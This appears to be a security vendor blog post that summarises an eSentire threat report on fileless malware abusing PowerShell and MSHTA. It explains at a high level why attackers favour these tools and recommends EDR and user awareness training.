According to a new threat report from security vendor eSentire, 91% of endpoint incidents involve files that won’t be defeated/blocked/removed by anti-malware solutions.
The bad guys have an advantage: your endpoints run applications by design! So, if they can leverage known legitimate binaries that are a part of the OS to accomplish malicious tasks, many of your leading anti-virus and endpoint protection solutions are helpless to stop them.
This is what eSentire found in their latest Quarterly Threat Report. Applications like PowerShell and MSHTA (Microsoft’s utility for executing HTML applications) were users 91% of the time in Q1 of this year alone.
This leveraging of executables that are known to the OS is yet another example of a fileless malware attack, an evasive malware technique being used to avoid detection by security solutions.
PowerShell particularly provides attackers with a number of capabilities that are “criminal-friendly”:
- It’s trusted – From an OS perspective, PowerShell is a highly reputable process. Its’ signature is trusted by the OS and is loaded directly through system memory (making it impossible to be scanned using heuristics). And because it’s integrated into Windows, PowerShell has unrestricted access to the operating system – making it the perfect tools for cybercriminals.
- It can run remotely – Through the use of WinRM, PowerShell remoting is easy, giving attackers the ability to run commands remotely without needing to have some kind of remote control software installed.
- It can provide total endpoint control – Remember, PowerShell was designed to bring control of the OS to the command line. So, as long as the cybercriminal is using an account with local admin rights, there isn’t much they can’t do on a compromised endpoint.
- It can access the enterprise – With the right elevated credentials, the ability to establish remote sessions on additional endpoints is built-in to PowerShell’s functionality, making lateral movement an easy task.
So, what should you do about it?
In the case of PowerShell and MSHTA, some endpoint detection and response (EDR) solutions do deep analysis of processes and their actions, looking for anomalous behavior. Finding one that can analyze even OS-specific processes will help.
In addition, educating users to be more aware of malware, phishing attacks, and how to avoid infection using security awareness training significantly reduces the potential that an attack – even ones that leverage tools like PowerShell – from ever taking hold in the first place.